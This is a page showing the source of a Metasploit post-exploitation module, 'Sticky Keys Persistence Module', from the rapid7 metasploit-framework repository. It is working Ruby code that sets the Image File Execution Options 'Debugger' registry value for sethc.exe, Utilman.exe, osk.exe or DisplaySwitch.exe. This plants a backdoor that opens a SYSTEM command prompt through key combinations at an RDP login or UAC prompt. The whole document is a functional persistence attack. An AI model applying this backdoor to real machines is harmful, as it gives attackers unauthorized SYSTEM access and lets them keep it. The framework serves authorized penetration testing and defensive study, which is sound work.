Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/sticky_keys.rb
19593 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8
  include Msf::Post::Windows::Registry

9
  include Msf::Post::Windows::Priv

10


11
  DEBUG_REG_PATH = 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'

12
  DEBUG_REG_VALUE = 'Debugger'

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Sticky Keys Persistence Module',

19
        'Description' => %q{

20
          This module makes it possible to apply the 'sticky keys' hack to a session with appropriate

21
          rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP

22
          login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting

23
          for certain executables.

24


25
          The module options allow for this hack to be applied to:

26


27
          SETHC   (sethc.exe is invoked when SHIFT is pressed 5 times),

28
          UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),

29
          OSK     (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard), and

30
          DISP    (DisplaySwitch.exe is invoked by pressing WINDOWS+P).

31


32
          The hack can be added using the ADD action, and removed with the REMOVE action.

33


34
          Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded

35
          to the target prior to running the module. By default, a SYSTEM command prompt is installed

36
          using the registry method if this module is run without modifying any parameters.

37
        },

38
        'Author' => ['OJ Reeves'],

39
        'Platform' => ['win'],

40
        'SessionTypes' => ['meterpreter', 'shell'],

41
        'Actions' => [

42
          ['ADD', { 'Description' => 'Add the backdoor to the target.' }],

43
          ['REMOVE', { 'Description' => 'Remove the backdoor from the target.' }]

44
        ],

45
        'References' => [

46
          ['URL', 'https://web.archive.org/web/20170201184448/https://social.technet.microsoft.com/Forums/windows/en-US/a3968ec9-5824-4bc2-82a2-a37ea88c273a/sticky-keys-exploit'],

47
          ['URL', 'https://blog.carnal0wnage.com/2012/04/privilege-escalation-via-sticky-keys.html']

48
        ],

49
        'DefaultAction' => 'ADD',

50
        'Notes' => {

51
          'Stability' => [CRASH_SAFE],

52
          'SideEffects' => [CONFIG_CHANGES],

53
          'Reliability' => []

54
        }

55
      )

56
    )

57


58
    register_options([

59
      OptEnum.new('TARGET', [true, 'The target binary to add the exploit to.', 'SETHC', ['SETHC', 'UTILMAN', 'OSK', 'DISP']]),

60
      OptString.new('EXE', [true, 'Executable to execute when the exploit is triggered.', '%SYSTEMROOT%\system32\cmd.exe'])

61
    ])

62
  end

63


64
  #

65
  # Returns the name of the executable to modify the debugger settings of.

66
  #

67
  def get_target_exe_name

68
    case datastore['TARGET']

69
    when 'UTILMAN'

70
      'Utilman.exe'

71
    when 'OSK'

72
      'osk.exe'

73
    when 'DISP'

74
      'DisplaySwitch.exe'

75
    else

76
      'sethc.exe'

77
    end

78
  end

79


80
  #

81
  # Returns the key combinations required to invoke the exploit once installed.

82
  #

83
  def get_target_key_combo

84
    case datastore['TARGET']

85
    when 'UTILMAN'

86
      'WINDOWS+U'

87
    when 'OSK'

88
      'WINDOWS+U, then launching the on-screen keyboard'

89
    when 'DISP'

90
      'WINDOWS+P'

91
    else

92
      'SHIFT 5 times'

93
    end

94
  end

95


96
  #

97
  # Returns the full path to the target's registry key based on the current target

98
  # settings.

99
  #

100
  def get_target_exe_reg_key

101
    "#{DEBUG_REG_PATH}\\#{get_target_exe_name}"

102
  end

103


104
  #

105
  # Runs the exploit.

106
  #

107
  def run

108
    unless is_admin?

109
      fail_with(Failure::NoAccess, 'The current session does not have administrative rights.')

110
    end

111


112
    print_good('Session has administrative rights, proceeding.')

113


114
    target_key = get_target_exe_reg_key

115


116
    if action.name == 'ADD'

117
      command = expand_path(datastore['EXE'])

118


119
      registry_createkey(target_key)

120
      registry_setvaldata(target_key, DEBUG_REG_VALUE, command, 'REG_SZ')

121


122
      print_good("'Sticky keys' successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.")

123
    else

124
      registry_deletekey(target_key)

125
      print_good("'Sticky keys' removed from registry key #{target_key}.")

126
    end

127
  end

128
end

129


130